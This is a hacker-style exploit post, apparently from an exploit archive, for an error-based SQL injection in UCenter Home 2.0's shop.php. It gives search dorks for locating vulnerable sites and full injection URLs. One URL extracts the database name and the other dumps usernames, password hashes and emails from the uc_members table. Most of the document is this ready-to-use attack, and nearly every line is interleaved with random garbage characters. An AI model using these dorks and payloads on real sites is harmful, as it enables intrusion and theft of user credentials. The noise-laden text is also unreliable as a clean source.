5 [, u, ]! B4 `* J
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
/ w( W& Y8 ~# y4 L( M. D
$ h- G2 s/ s& ^* a! L) l% A, G
2 ^- V" t! K/ W6 }3 V/ F4 D( z
) J9 v( h' p y7 S, s) B" s*/ Author : KnocKout
1 d( b9 a0 S8 w
3 ~& a4 q$ Q- T6 s8 S# M: Q*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& [% ^* R$ T8 ^! f2 r% c! y6 I" {$ s" z$ S
*/ Contact: knockoutr@msn.com 2 [" k: D9 E. [$ M9 p
( L) o/ {9 ^- z( b) d*/ Cyber-Warrior.org/CWKnocKout
) ?; s1 x! S. j( q9 ^- }' ^! @! `( I# v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ a, J- g R( j9 u {8 c0 Y( u8 U. y5 a8 E) Q
Script : UCenter Home
8 o* S& Y. p' u7 }; A ?( Y7 @* c R! S$ F H, Q( U
Version : 2.0 ( J( W8 U; d# }( S" j- t- p
+ h: s2 @8 g9 t: N& ~, n
Script HomePage : http://u.discuz.net/ ) K$ K. J* Z. O: f* @4 q
" T% o2 U/ j. q9 t6 D9 @/ l
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 q* p5 Q1 Y# h, Z+ M
$ b8 |, ]6 p. S$ ^* X4 Z4 c1 k
Dork : Powered by UCenter inurl:shop.php?ac=view
) E1 K/ E* z" v' h# q& V% h$ { b8 S1 [
Dork 2 : inurl:shop.php?ac=view&shopid=
+ F8 p" c' _! I0 |" l3 f& A
) p5 e0 j9 H5 } b @; n__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 t5 v1 p+ m8 {3 l9 K$ E! J) l
" V3 {" l: {4 f" ]' b3 h9 UVuln file : Shop.php
) P8 Z: H: B7 }9 t; ^" X9 k2 I7 O2 G
value's : (?)ac=view&shopid=
3 g: Q7 `& t, S1 m! ~0 B5 ~
H! t/ H* ]3 m4 R0 @# ^( iVulnerable Style : SQL Injection (MySQL Error Based)
# _- y& [# u& P# p5 g
h: v% D0 x! p+ z. nNeed Metarials : Hex Conversion 3 h7 `6 u7 T- D3 Z
' D) V* n/ V5 D__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 B' ^+ [: ~- e8 l2 w
4 i9 I5 n8 |: ? \* Q5 ]9 g# t- yYour Need victim Database name. G0 s/ N9 U3 S
! k3 P0 @4 E3 Tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 X% E" h; K. T1 q/ c! g
6 o' p7 e: Y' A0 d.. 9 m1 l: E! s0 H: [4 j6 F
- j, z6 G& ?7 q, o9 YDB : Okey. , h3 ?. ^" W1 m. ?( y
" k; O0 k3 O. t3 p6 f: ]9 D
your edit DB `[TARGET DB NAME]`
0 }. ]$ s4 \, j* S% E6 I# D7 h3 N% t" K: @1 H" A
Example : 'hiwir1_ucenter' + @- F$ v8 s+ m" U1 l
`: x( Z+ t1 \/ ~; @+ C/ qEdit : Okey.
+ Q7 Q& u- t& i9 Q2 T
& n8 `: A0 D: O0 [ QYour use Hex conversion. And edit Your SQL Injection Exploit..
: j8 i: H: D3 }% d
; d" y5 z Z( a l7 n3 b
# o; e7 _' m) m s
8 U2 H3 J. i7 x# } ?7 y) Q0 _Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ; v1 U5 Q4 P: W# Y! \- h
|